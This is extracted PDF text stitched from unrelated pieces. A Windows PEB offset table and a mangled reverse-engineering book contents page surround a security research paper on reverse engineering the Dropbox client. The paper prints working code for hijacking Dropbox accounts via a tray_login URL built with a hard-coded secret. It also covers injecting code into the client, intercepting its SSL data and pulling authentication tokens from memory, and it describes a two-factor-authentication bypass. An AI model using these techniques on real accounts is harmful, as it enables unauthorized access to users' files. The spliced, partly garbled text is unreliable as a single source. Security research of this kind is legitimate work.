0x00C0 unsigned long (x64: unsigned __int64), ImageProcessAffinityMask unsigned long (x64: unsigned __int64), ActiveProcessAffinityMask 0x0138
0x00C4 unsigned long[0x22] (x64: unsigned long[0x3C]), GdiHandleBuffer 0x0140
0x014C function  *, PostProcessInitRoutine 0x0230
0x0150 void *, TlsExpansionBitmap 0x0238
0x0154 unsigned long[0x20], TlsExpansionBitmapBits 0x0240
0x01D4 unsigned long, SessionId 0x02C0
0x01D8 union _ULARGE_INTEGER, AppCompatFlags 0x02C8
0x01E0 union _ULARGE_INTEGER, AppCompatFlagsUser 0x02D0
0x01E8 void *, pShimData 0x02D8
0x01EC void *, AppCompatInfo 0x02E0
0x01F0 struct _UNICODE_STRING, CSDVersion 0x02E8
0x01F8 void *, ActivationContextData const struct _ACTIVATION_CONTEXT_DATA *, ActivationContextData 0x02F8
0x01FC void *, ProcessAssemblyStorageMap struct _ASSEMBLY_STORAGE_MAP *, ProcessAssemblyStorageMap 0x0300
0x0200 void *, SystemDefaultActivationContextData const struct _ACTIVATION_CONTEXT_DATA *, SystemDefaultActivationContextData 0x0308
0x0204 void *, SystemAssemblyStorageMap struct _ASSEMBLY_STORAGE_MAP *, SystemAssemblyStorageMap 0x0310
0x0208 unsigned long (x64: unsigned __int64), MinimumStackCommit 0x0318
0x020C void * *, FlsCallback struct _FLS_CALLBACK_INFO *, FlsCallback 0x0320
0x0210 struct _LIST_ENTRY, FlsListHead 0x0328
0x0218 void *, FlsBitmap 0x0338
0x021C unsigned long[0x4], FlsBitmapBits 0x0340
0x022C unsigned long, FlsHighIndex 0x0350
0x0230 void *, WerRegistrationData 0x0358
0x0234 void *, WerShipAssertPtr 0x0360
0x0238 void *, pContextData void *, pUnused 0x0368
0x023C void *, pImageHeaderHash 0x0370
0x0240 unsigned long, TracingFlags 0x0378
0x0240:0x00(1) unsigned long, HeapTracingEnabled 0x0378:0x00(1)
0x0240:0x01(1) unsigned long, CritSecTracingEnabled 0x0378:0x01(1)
0x0240:0x02(1) unsigned long, 
SpareTracingBitsunsigned long, LibLoaderTracingEnabled 0x0378:0x02(1)
0x0240:0x03(1D) unsigned long, SpareTracingBits 0x0378:0x03(1D)
0x0248 unsigned __int64, CsrServerReadOnlySharedMemoryBase 0x0380
XP, XP SP1 XP SP2, XP SP3 2003 2003 SP1, 2003 SP2 VistaVista SP1, Vista  
SP2Win7 BetaWin7 RC, Win7 
RTMWin8 Dev 
Prev x64 
(8102)Win8 Beta Win8 RC, Win8 RTM
© Copyright 2013, ReWolf ( http://blog.rewolf.pl )Looking inside the (Drop) box
Dhiru Kholia
Openwall / University of British Columbia
dhiru@openwall.comPrzemysław W ̨ egrzyn
CodePainters
wegrzyn@codepainters.com
Abstract
Dropbox is a cloud based file storage service used by
more than 100 million users. In spite of its widespread
popularity, we believe that Dropbox as a platform hasn’t
been analyzed extensively enough from a security stand-
point. Also, the previous work on the security analysis of
Dropbox has been heavily censored. Moreover, the exist-
ing Python bytecode reversing techniques are not enough
for reversing hardened applications like Dropbox.
This paper presents new and generic techniques, to re-
verse engineer frozen Python applications, which are not
limited to just the Dropbox world. We describe a method
to bypass Dropbox’s two factor authentication and hijack
Dropbox accounts. Additionally, generic techniques to
intercept SSL data using code injection techniques and
monkey patching are presented.
We believe that our biggest contribution is to open up
the Dropbox platform to further security analysis and re-
search. Dropbox will / should no longer be a black box.
Finally, we describe the design and implementation of an
open-source version of Dropbox client (and yes, it runs
on ARM too).
1 Introduction
The Dropbox clients run on around ten platforms and
many of these Dropbox clients are written mostly in
Python [7]. The client consists of a modified Python in-
terpreter running obfuscated Python bytecode. However,
Dropbox being a proprietary platform, no source code is
available for these clients. Moreover, the API being used
by the various Dropbox clients is not documented.
Before trusting our data to Dropbox, it would be wise
(in our opinion) to know more about the internals of
Dropbox. Questions about the security of the upload-
ing process, two-factor authentication and data encryp-
tion are some of the most obvious.
Our paper attempts to answer these questions andmore. In this paper, we show how to unpack, decrypt and
decompile Dropbox from scratch and in full detail. This
paper presents new and generic techniques to reverse en-
gineer frozen Python applications. Once you have the de-
compiled source-code, it is possible to study how Drop-
box works in detail. This Dropbox source-code revers-
ing step is the foundation of this paper and is described
in section 3.
Our work uses various code injection techniques and
monkey-patching to intercept SSL data in Dropbox
client. We have used these techniques successfully to
snoop on SSL data in other commercial products as well.
These techniques are generic enough and we believe
would aid in future software development, testing and
security research.
Our work reveals the internal API used by Dropbox
client and makes it straightforward to write a portable
open-source Dropbox client, which we present in sec-
tion 5. Ettercap and Metasploit plug-ins (for observing
LAN sync protocol and account hijacking, respectively)
are presented which break various security aspects of
Dropbox. Additionally, we show how to bypass Drop-
box’s two factor authentication and gain access to user’s
data.
We hope that our work inspires the security commu-
nity to write an open-source Dropbox client, refine the
techniques presented in this paper and conduct research
into other cloud based storage systems.
2 Existing Work
In this section, we cover existing work related to security
analysis of Dropbox and analyze previously published
reversing techniques for Python applications.
Critical Analysis of Dropbox Software Security [15]
analyzes Dropbox versions from 1.1.x to 1.5.x. However,
the techniques presented in this paper are not generic
enough to deal with the changing bytecode encryption
methods employed in Dropbox and in fact, fail to work
for Dropbox versions >= 1.6. Another tool called drop-
boxdec, Dropbox Bytecode Decryption Tool [5] fails to
work since it only can deal with encryption algorithm
used in the earlier versions (1.1.x) of Dropbox. Our work
bypasses the bytecode decryption step entirely and is
more robust against the ever changing encryption meth-
ods employed in Dropbox.
The techniques presented in pyREtic [17] do not work
against Dropbox since co_code (code object attribute
which contains bytecode) cannot be accessed any more
at the Python layer. Furthermore, the key technique used
by pyREtic (replacing original obfuscated .pyc bytecode
file with desired .py file) to gain control over execu-
tion no longer works. Dropbox patches the standard
import functionality which renders pyREtic’s key tech-
nique useless. We get around this problem by using
standard and well-understood code injection techniques
like Reflective DLL injection [3] (on Windows) and
LD_PRELOAD [6] (on Linux). marshal.dumps function
which could be potentially used for dumping bytecode is
patched too! Also, techniques described in Reverse En-
gineering Python Applications [11] do not work against
Dropbox for the very same reasons. We work around this
problem by dynamically finding the co_code attribute at
the C layer. In short, Dropbox is challenging to reverse
and existing techniques fail.
Another interesting attack on the older versions of
Dropbox is implemented in the dropship tool [19]. Es-
sentially dropship allows a user to gain access to files
which the user doesn’t own provided the user has the cor-
rect cryptographic hashes of the desired files. However,
Dropbox has patched this attack vector and we have not
been able to find similar attacks yet.
3 Breaking the (Drop)box
In this section we explain various ways to reverse-
engineer Dropbox application on Windows and Linux
platform. We have analyzed Dropbox versions from
1.1.x to 2.2.8 (latest as of 01-July-2013).
Dropbox clients for Linux, Windows and Mac OS are
written mostly in Python. On Windows, py2exe [12] is
used for packaging the source-code and generating the
deliverable application. A heavily fortified version of
the Python interpreter can be extracted from the PE re-
sources of Dropbox.exe executable using tools like PE
Explorer or Resource Hacker. Dropbox.exe also contains
a ZIP of all encrypted .pyc files containing obfuscated
bytecode.
On Linux, Dropbox is packaged (most likely) using
thebbfreeze utility [16]. bbfreeze uses static linking (for
Python interpreter and the OpenSSL library) and as such
there is no shared library which can be extracted out and
analyzed in a debugger or a disassembler.3.1 Unpacking Dropbox
A generic unpacker for Dropbox.exe executable (drop-
box / main on Linux) is trivial to write,
import zipfile
from zipfile import PyZipFile
fileName = "Dropbox.exe"
mode = "r"
ztype = zipfile.ZIP_DEFLATED
f = PyZipFile(fileName, "r", ztype)
f.extractall("bytecode_encrypted")
This script will extract the encrypted .pyc files (which
contain bytecode) in a folder called bytecode_encrypted .
Normally, .pyc files contain a four-byte magic number, a
four-byte modification timestamp and a marshalled code
object [1]. In case of Dropbox, the marshalled code ob-
ject is encrypted. In the next section, we describe various
techniques to decrypt these encrypted .pyc files.
3.2 Decrypting encrypted Dropbox byte-
code
As briefly mentioned earlier, we extract the customized
Python interpreter named Python27.dll from the PE re-
sources of Dropbox.exe executable using PE Explorer.
This Python27.dll file from the Windows version of
Dropbox was analyzed using IDA Pro and BinDiff to
see how it is different from the standard interpreter
DLL. We found out that many standard functions like
PyRun_File(), marshal.dumps are nop’ed out to make re-
verse engineering Dropbox harder.
A casual inspection of extracted .pyc files reveals no
visible strings which is not the case with standard .pyc
files. This implies that encryption (or some obfusca-
tion) is being employed by Dropbox to protect bytecode.
We found that Python’s r_object() (in marshal.c) func-
tion was patched to decrypt code objects upon loading.
Additionally, Dropbox’s .pyc files use a non-standard
magic number (4 bytes), this however is trivial to fix.
To decrypt the buffer r_object() calls a separate func-
tion inside Python27.dll. We figured out a way to call
this decryption function from outside the DLL and then
consequently dump the decrypted bytecode back to disk.
There is no need at all to analyse the encryption algo-
rithm, keys, etc. However we had to rely on calling a
hard-coded address and this decryption function has no
symbol attached. Additionally, On Linux, everything is
statically linked into a single binary and the decryption
function is inlined into r_object(). So, we can no longer
call this decryption function in a standalone fashion.
To overcome this problem, we looked around for a
more robust approach and hit upon the idea of loading
the .pyc files into memory from the disk and then se-
rializing them back. We use LD_PRELOAD (Reflec-
tive DLL injection on Windows) to inject our C code
into dropbox process, then we override (hijack) a com-
mon C function (like strlen) to gain control over the
control flow and finally we inject Python code by call-
ing PyRun_SimpleString (official Python C API function
which is not patched!). Hence it is possible to execute ar-
bitrary code in Dropbox client context.
We should mention that running Python code from
within the injected code in Dropbox context requires GIL
(Global Interpreter Lock) [20] to be acquired.
// use dlsym(RTLD_DEFAULT...) to find
// symbols from within the injected code
PyGILState_STATE gstate;
gstate = PyGILState_Ensure();
PyRun_SimpleString("print ’w00t!’");
Now we explain how we get Dropbox to do the de-
cryption work for us and for free. From the injected
code we can call PyMarshal_ReadLastObjectFromFile()
which loads the code object from encrypted .pyc file. So,
in memory we essentially have unencrypted code object
available. However, the co_code string (which contains
the bytecode instructions) is not exposed at the Python
layer (this can be done by modifying code_memberlist
array in Objects/codeobject.c file). So after locating this
decrypted code object (using a linear memory search) we
serialize it back to file. However this again is not straight-
forward since marshal.dumps method is nop’ed. In other
words, object marshalling is stripped out in the custom
version of Python used by Dropbox. So, we resort to
using PyPy’s _marshal.py [13] which we inject into the
running Dropbox process.
Dropbox keeps changing the bytecode encryption
scheme. In Dropbox 1.1.x, TEA cipher, along with an
RNG seeded by some values embedded in the code ob-
ject of each python module, is used to perform bytecode
encryption [5]. In Dropbox 1.1.45 this RNG function
was changed and this broke dropboxdec [5] utility. [15]
runs into similar problems as well. In short, these chang-
ing bytecode encryption schemes used by Dropbox are
quite effective against older reversing approaches. In
contrast, our reversing techniques are not affected by
such changes at all.
In summary, we get decryption for free! Our method
is a lot shorter, easier and more reliable than the ones
used in [5] and [15]. Overall, we have 200 lines of C and
350 lines of Python (including marshal code from PyPy).
Our method is robust, as we do not even need to deal with
the ever changing decryption algorithms ourselves. Our
decryption tool works with all versions of Dropbox that
we used for testing. Finally, the techniques described in
this section are generic enough and also work for revers-ing other frozen Python applications (e.g. Druva inSync
and Google Drive Insync client).
3.3 Opcode remapping
The next anti-reversing technique used by Dropbox is
Opcode remapping. The decrypted .pyc files have valid
strings (which are expected in standard Python byte-
code), but these .pyc files still fail to load under standard
interpreter due to opcodes being swapped.
CPython is a simple opcode (1 byte long) interpreter.
ceval.c is mostly a big switch statement inside a loop
which evaluates these opcodes. In Dropbox, this part is
patched to use different opcode values. We were able to
recover this mapping manually by comparing disassem-
bled DLL with ceval.c (standard CPython file). However,
this process is time consuming and won’t really scale if
Dropbox decided to use even slightly different opcode
mapping in the newer versions.
A technique to break this protection is described
in pyREtic [17] paper and is partially used in drop-
boxdec [5]. In short, Dropbox bytecode is compared
against standard Python bytecode for common modules.
It does not work (as it is) against Dropbox because
co_code (bytecode string) is not available at the Python
layer and Python import has been patched in order to not
load .py files. However, it is possible to compare de-
crypted Dropbox bytecode (obtained using our method)
with standard bytecode for common Python modules and
come up with opcode mapping used by Dropbox.
However, we did not explore this and other automated
opcode deduction techniques because in practice, the
opcode mapping employed in Dropbox hasn’t changed
since version 1.6.0. That being said, we would like to at-
tempt solving this problem in the future. In the next sec-
tion, we describe how to decompile the recovered .pyc
files.
3.4 Decompiling decrypted bytecode
For decompiling decrypted Python bytecode to Python
source code we rely on uncompyle2 [22], which is a
Python 2.7 byte-code decompiler, written in Python 2.7.
uncompyle2 is straightforward to use and the decom-
piled source code works fine. We were able to recover
all the Python source code used in Dropbox with un-
compyle2.
In the next section, we analyse how Dropbox authen-
tication works and then present some attacks against it.
4 Dropbox security and attacks
Accessing Dropbox’s website requires one to have the
necessary credentials (email address and password). The
same credentials are also required in order to link (regis-
ter) a device with a Dropbox account. In this registration
process, the end-user device is associated with a unique
host_id which is used for all future authentication oper-
ations. In other words, Dropbox client doesn’t store or
use user credentials once it has been linked to the user
account. host_id is not affected by password changes
and it is stored locally on the end-user device.
In older versions (< 1.2.48) of Dropbox, this host_id
was stored locally in clear-text in an SQLite database
(named config.db ). By simply copying this SQLite
database file to another machine, it was possible to gain
access to the target user’s data. This attack vector is de-
scribed in detail in the "Dropbox authentication: insecure
by design" post [10].
However, from version 1.2.48 onwards, host_id is
now stored in an encrypted local SQLite database [18].
However, host_id can still be extracted from the en-
crypted SQLite database ( $HOME/.dropbox/config.dbx )
since the secrets (various inputs) used in deriving the
database encryption key are stored on the end-user device
(however, local storage of such secrets can’t be avoided
since Dropbox client depends on them to work). On Win-
dows, DPAPI encryption is used to protect the secrets
whereas on Linux a custom obfuscator is used by Drop-
box. It is straightforward to discover where the secrets
are stored and how the database encryption key is de-
rived. The relevant code for doing so on Linux is in com-
mon_util/keystore/keystore_linux.py file. dbx-keygen-
linux [14] (which uses reversed Dropbox sources) is also
capable of recovering the database encryption key. It also
works for decrypting filecache.dbx encrypted database
which contains meta-data and which could be useful for
forensic purposes.
Additionally, another value host_int in now involved
in the authentication process. After analyzing Dropbox
traffic, we found out that host_int is received from the
server at startup and also that it does not change.
4.1 host_id and host_int
Dropbox client has a handy feature which enables a user
to login to Dropbox’s website without providing any cre-
dentials. This is done by selecting "Launch Dropbox
Website" from the Dropbox tray icon. So, how exactly
does the Dropbox client accomplish this? Well, two val-
ues, host_id and host_int are involved in this process. In
fact, knowing host_id and host_int values that are being
used by a Dropbox client is enough to access all data
from that particular Dropbox account. host_id can be ex-
tracted from the encrypted SQLite database or from the
target’s memory using various code injection techniques.
host_int can be sniffed from Dropbox LAN sync pro-
tocol traffic. While this protocol can be disabled, it isturned on by default. We have written an Ettercap plug-
in [8] to sniff the host_int value remotely on a LAN. It
is also possible to extract this value from the target ma-
chine’s memory.
We found an interesting attack on Dropbox versions
(<= 1.6.x) in which it was possible to extract the host_id
and host_int values from the logs generated by the Drop-
box client. However the Dropbox client generated these
logs only when a special environment variable (DB-
DEV) was set properly. Dropbox turns on logging
only when the MD5 checksum of DBDEV starts with
"c3da6009e4". James Hall from the #openwall channel
was able to crack this partial MD5 hash and he found
out that the string "a2y6shya" generates the required par-
tial MD5 collision. Our Metasploit plug-in [9] exploits
this "property" and is able to remotely hijack Dropbox
accounts. This property has been patched after we dis-
closed it responsibly to Dropbox. However, the next sec-
tion will describe a new way of hijacking Dropbox ac-
counts which cannot be patched easily.
We mentioned earlier that the host_int value is re-
ceived from the server at startup and that it does not
change. So, it is obviously possible to ask the Dropbox
server itself for this value, just like the Dropbox client
does!
import json
import requests
host_id = <UNKNOWN>
data = ("buildno=Dropbox-win-1.7.5&tag="
"&uuid=123456&server_list=True&"
"host_id=%s&hostname=random"
% host_id)
base_url = ’https://client10.dropbox.com’
url = base_url + ’/register_host’
headers = {’content-type’: \
’application/x-www-form-urlencoded’, \
’User-Agent’: "Dropbox ARM" }
r = requests.post(url, data=data,
headers=headers)
data = json.loads(r.text)
host_int = data["host_int"]
4.2 Hijacking Dropbox accounts
Once, host_int and host_id values for a particular Drop-
box client are known, it is possible to gain access to
that account using the following code. We call this the
tray_login method.
import hashlib
import time
host_id = <UNKNOWN>
host_int = <ASK SERVER>
now = int(time.time())
fixed_secret = ’sKeevie4jeeVie9bEen5baRFin9’
h = hashlib.sha1(’%s%s%d’% (fixed_secret,
host_id, now)).hexdigest()
url = ("https://www.dropbox.com/tray_login?"
"i=%d&t=%d&v=%s&url=home&cl=en" %
(host_int, now, h))
Accessing the urloutput of the above code takes one to
the Dropbox account of the target user. We have shown
(in the previous section) a method to get the host_int
value from the Dropbox server itself. So, in short, we
have revived the earlier attack (which was fixed by Drop-
box) on Dropbox accounts which required knowing only
the host_id value to access the target’s Dropbox account.
While this new technique for hijacking Dropbox ac-
counts works fine currently, we have observed that
the latest versions of Dropbox client do not use this
tray_login mechanism (in order to allow the user to auto-
matically login to the website). They now rely on heav-
ier obfuscation and random nonces (received from the
server) to generate those auto-login URLs. We plan to
break this new auto-login mechanism in the near future.
5 Intercepting SSL data
In previous code samples, we have used undocumented
Dropbox API. In this section we describe how we dis-
covered this internal API. Existing SSL MiTM (man-in-
the-middle) tools (e.g. Burp Suite) cannot sniff Drop-
box traffic since Dropbox client uses hard coded SSL
certificates. Additionally the OpenSSL library is stati-
cally linked with Dropbox executable. Binary patching is
somewhat hard and time-consuming. We get around this
problem by using Reflective DLL injection [3] (on Win-
dows) and LD_PRELOAD [6] on Linux) to gain control
over execution, followed by monkey patching [21] of all
"interesting" objects.
Once we are able to execute arbitrary code in Drop-
box client context, we patch all SSL objects and are able
to snoop on the data before it has been encrypted (on
sending side) and after it has been decrypted (on receiv-
ing side). This is how we intercept SSL data. We have
successfully used the same technique on multiple com-
mercial Python applications (e.g. Druva inSync). The
following code shows how we locate and patch interest-
ing Python objects at runtime.import gc
f = open("SSL-data.txt", "w")
def ssl_read(*args):
data = ssl_read_saved(*args)
f.write(str(data))
return data
def patch_object(obj):
if isinstance(obj, SSLSocket) \
and not hasattr(obj, "marked"):
obj.marked = True
ssl_read_saved = obj.read
obj.read = ssl_read
while True:
objs = gc.get_objects()
for obj in objs:
patch_object(obj)
time.sleep(1)
This monkey patching technique to break SSL can also
be used with other dynamic languages like Ruby, Perl,
JavaScript, Perl and Groovy.
5.1 Bypassing 2FA
We found that two-factor authentication (as used by
Dropbox) only protects against unauthorized access to
the Dropbox’s website. The Dropbox internal client API
does not support or use two-factor authentication! This
implies that it is sufficient to have only the host_id value
to gain access to the target’s data stored in Dropbox.
5.2 Open-source Dropbox client
Based on the findings of the earlier sections, it is straight-
forward to write an open-source Dropbox client. The fol-
lowing code snippet shows how to fetch the list of files
stored in a Dropbox account.
host_id = "?"
BASE_URL = ’https://client10.dropbox.com/’
register_url = BASE_URL + ’register_host’
list_url = BASE_URL + "list"
# headers
headers = {’content-type’: \
’application/x-www-form-urlencoded’, \
’User-Agent’: "Dropbox ARM" }
# message
data = ("buildno=ARM&tag=&uuid=42&"
"server_list=True&host_id=%s"
"&hostname=r" % host_id)
r = requests.post(register_url,
data=data, headers=headers)
# extract data
data = json.loads(r.text)
host_int = data["host_int"]
root_ns = data["root_ns"]
# fetch data list
root_ns = str(root_ns) + "_-1"
data = data + ("&ns_map=%s&dict_return=1"
"&server_list=True&last_cu_id=-1&"
"need_sandboxes=0&xattrs=True"
% root_ns)
# fetch list of files
r = requests.post(list_url,
data=data, headers=headers)
data = json.loads(r.text)
paths = data["list"]
# show a list of files and their hashes
print paths
Similarly, we are able to upload and update files us-
ing our open-source Dropbox client. We hope that our
work inspires the open-source community to write a full-
fledged open-source Dropbox client capable of running
even on platforms not supported by Dropbox.
5.3 New ways to hijack accounts
We have briefly mentioned previously that it is possible
to extract host_id and host_int from the Dropbox client’s
memory once control of execution flow has been gained
by using Reflective DLL injection or LD_PRELOAD.
The following code snippet shows how exactly this can
be accomplished.
# 1. Inject code into Dropbox.
# 2. Locate PyRun_SimpleString using dlsym
# from within the Dropbox process
# 3. Feed the following code to the located
# PyRun_SimpleString
import gc
objs = gc.get_objects()
for obj in objs:
if hasattr(obj, "host_id"):
print obj.host_id
if hasattr(obj, "host_int"):
print obj.host_int
We believe that this technique (snooping on objects) is
hard to protect against. Even if Dropbox somehow pre-
vents attackers from gaining control over the execution
flow, it is still possible to use smart memory snooping at-
tacks as implemented in passe-partout [2]. We plan to
extend passe-partout to carry out more generic memory
snooping attacks in the near future.6 Mitigations
We believe that the arms race between software protec-
tion and software reverse engineering would go on. Pro-
tecting software against reverse engineering is hard but
it is definitely possible to make the process of reverse
engineering even harder.
Dropbox uses various techniques to deter reverse en-
gineering like changing bytecode magic number, byte-
code encryption, opcode remapping, disabling functions
which could aid reversing, static linking, using hard
coded certificates and hiding raw bytecode objects. We
think that all these techniques are good enough against
a casual attacker. Additionally, Dropbox could use tech-
niques like function name mangling, marshalling format
changes to make reverse engineering harder.
That being said, we wonder what Dropbox aims to
gain by employing such anti-reversing measures. Most
of the Dropbox’s "secret sauce" is on the server side
which is already well protected. We do not believe that
these anti-RE measures are beneficial for Dropbox users
and for Dropbox.
7 Challenges and future work
The various things we would like to explore are find-
ing automated techniques for reversing opcode mappings
and discovering new attacks on the LAN sync protocol
used by Dropbox.
Activating logging in Dropbox now requires cracking
a full SHA-256 hash (e27eae61e774b19f4053361e523c7
71a92e838026da42c60e6b097d9cb2bc825). The plain-
text corresponding to this hash needs to be externally
supplied to the Dropbox client (in order to activate log-
ging) and this plaintext value is not public.
Another interesting challenge is to run Dropbox back
from its decompiled sources. We have been partially suc-
cessful (so far) in doing so. We would like to work on
making the technique of dumping bytecode from mem-
ory (described in the pyREtic [17] paper) work for Drop-
box.
At some point, Dropbox service will disable the exist-
ing "tray_login" method which will make hijacking ac-
counts harder. Therefore, we would like to continue our
work on finding new ways to do it.
8 Acknowledgments
We would like to thank Nicolas Ruff, Florian Ledoux and
wibiti for their work on uncompyle2. We also thank the
anonymous reviewers as well as other Openwall folks for
their helpful comments and feedback.
9 Availability
Our and other tools used by us are available on GitHub
athttps://github.com/kholia . Python decompiler
is available at [22] and the code for Reflective DLL In-
jection is available at [4]. We also plan to publish the
complete source code of our tools and exploits on GitHub
around conference time.
References
[1] B ATCHELDER , N. The structure of .pyc files.
http://nedbatchelder.com/blog/200804/the_
structure_of_pyc_files.html , 2008.
[2] C OLLIGNON , N., AND AVIAT , J.-B. passe-partout, extract ssl
private keys from process memory.
https://github.com/kholia/passe-partout , 2011.
[3] F EWER , S. Reflective DLL injection.
www.harmonysecurity.com/files/HS-P005_
ReflectiveDllInjection.pdf , 2008.
[4] F EWER , S. Reflective dll injection code.
https://github.com/stephenfewer/ReflectiveDLLInjection, 2008.
[5] F RITSCH , H. Dropbox bytecode decryption tool.
https://github.com/rumpeltux/dropboxdec , 2012.
[6] GNU. LD_PRELOAD - dynamic linker and loader feature.
http://man7.org/linux/man-pages/man8/ld.so.8.html, 1987.
[7] H UNTER , R. How dropbox did it and how python helped.
PyCon 2011 (2011).
[8] K HOLIA , D. db-lsp-disc dissector to figure out host_int.
https://github.com/kholia/ettercap/tree/dropbox ,
2013.
[9] K HOLIA , D. Long promised post module for hijacking dropbox
accounts. https://github.com/rapid7/
metasploit-framework/pull/1497 , 2013.
[10] N EWTON , D. Dropbox authentication: insecure by design.
http://dereknewton.com/2011/04/
dropbox-authentication-static-host-ids/ , 2011.
[11] P ORTNOY , A., AND SANTIAGO , A.-R. Reverse engineering
python applications. In Proceedings of the 2nd conference on
USENIX Workshop on offensive technologies (2008), USENIX
Association, p. 6.
[12] R ETZLAFF , J. py2exe, distutils extension to build standalone
windows executable programs from python scripts.
https://pypi.python.org/pypi/bbfreeze/ , 2002.
[13] R IGO, A., ET AL . Pypy, python interpreter and just-in-time
compiler. http://pypy.org/ , 2009.
[14] R UFF, N., AND LEDOUX , F. Encryption key extractor for
dropbox dbx files.
https://github.com/newsoft/dbx-keygen-linux.git ,
2008.
[15] R UFF, N., AND LEDOUX , F. A critical analysis of dropbox
software security. ASFWS 2012, Application Security Forum
(2012).
[16] S CHMITT , R. bbfreeze, create standalone executables from
python scripts.
https://pypi.python.org/pypi/bbfreeze/ , 2007.
[17] S MITH , R. pyretic, in memory reverse engineering for
obfuscated python bytecode. BlackHat / Defcon 2010 security
conferences (2010).[18] SQLITE @HWACI .COM . The sqlite encryption extension (see).
http://www.hwaci.com/sw/sqlite/see.html , 2008.
[19] VAN DER LAAN , W. dropship - dropbox api utilities.
https://github.com/driverdan/dropship , 2011.
[20] VAN ROSSUM , G. Global Interpreter Lock.
http://wiki.python.org/moin/GlobalInterpreterLock, 1991.
[21] V ARIOUS . Monkey patch, modifying the run-time code of
dynamic language.
http://en.wikipedia.org/wiki/Monkey_patch , 1972.
[22] WIBITI , ELOIVANDERBEKEN , F. L., ET AL . uncompyle2, a
python 2.7 byte-code decompiler, written in python 2.7.
https://github.com/wibiti/uncompyle2.git , 2012.Quick introduction to reverse engineering for beginners
Dennis Yurichev
<dennis@yurichev.com>
cbnd
c○/two.pnum/zero.pnum/one.pnum/three.pnum, Dennis Yurichev.
This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivs /three.pnum./zero.pnum Unported
License. To view a copy of this license, visit
http://creativecommons.org/licenses/by-nc-nd/3.0/ .
Text version (August /one.pnum/three.pnum, /two.pnum/zero.pnum/one.pnum/three.pnum).
Probably, newer version of this text, and also Russian language version is also accessible at
http://yurichev.com/RE-book.html
You may also subscribe to my twitter, to get information about updates of this text, etc: @yurichev
Contents
Preface v
About author vi
Thanks vii
/one.pnum Compiler’s patterns /one.pnum
/one.pnum./one.pnum Hello, world! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum
/one.pnum./one.pnum./one.pnum x/eight.pnum/six.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum
/one.pnum./one.pnum./two.pnum ARM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /four.pnum
/one.pnum./two.pnum Stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /eight.pnum
/one.pnum./two.pnum./one.pnum Save return address where function should return control a/f_ter execution . . . . . . . . . . /eight.pnum
/one.pnum./two.pnum./two.pnum Function arguments passing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /nine.pnum
/one.pnum./two.pnum./three.pnum Local variable storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /nine.pnum
/one.pnum./two.pnum./four.pnum (Windows) SEH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/one.pnum
/one.pnum./two.pnum./five.pnum Buffer overflow protection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/one.pnum
/one.pnum./three.pnumprintf() with several arguments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/two.pnum
/one.pnum./three.pnum./one.pnum x/eight.pnum/six.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/two.pnum
/one.pnum./three.pnum./two.pnum ARM: /three.pnum printf() arguments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/three.pnum
/one.pnum./three.pnum./three.pnum ARM: /eight.pnum printf() arguments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/four.pnum
/one.pnum./three.pnum./four.pnum By the way . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum
/one.pnum./four.pnum scanf() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/eight.pnum
/one.pnum./four.pnum./one.pnum About pointers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/eight.pnum
/one.pnum./four.pnum./two.pnum x/eight.pnum/six.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/eight.pnum
/one.pnum./four.pnum./three.pnum ARM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/zero.pnum
/one.pnum./four.pnum./four.pnum Global variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/zero.pnum
/one.pnum./four.pnum./five.pnum scanf() result checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/three.pnum
/one.pnum./five.pnum Passing arguments via stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum
/one.pnum./five.pnum./one.pnum x/eight.pnum/six.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum
/one.pnum./five.pnum./two.pnum ARM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/six.pnum
/one.pnum./six.pnum One more word about results returning. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/eight.pnum
/one.pnum./seven.pnum Pointers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/nine.pnum
/one.pnum./seven.pnum./one.pnum C++ references . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /three.pnum/zero.pnum
/one.pnum./eight.pnum Conditional jumps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /three.pnum/one.pnum
/one.pnum./eight.pnum./one.pnum x/eight.pnum/six.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /three.pnum/one.pnum
/one.pnum./eight.pnum./two.pnum ARM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /three.pnum/three.pnum
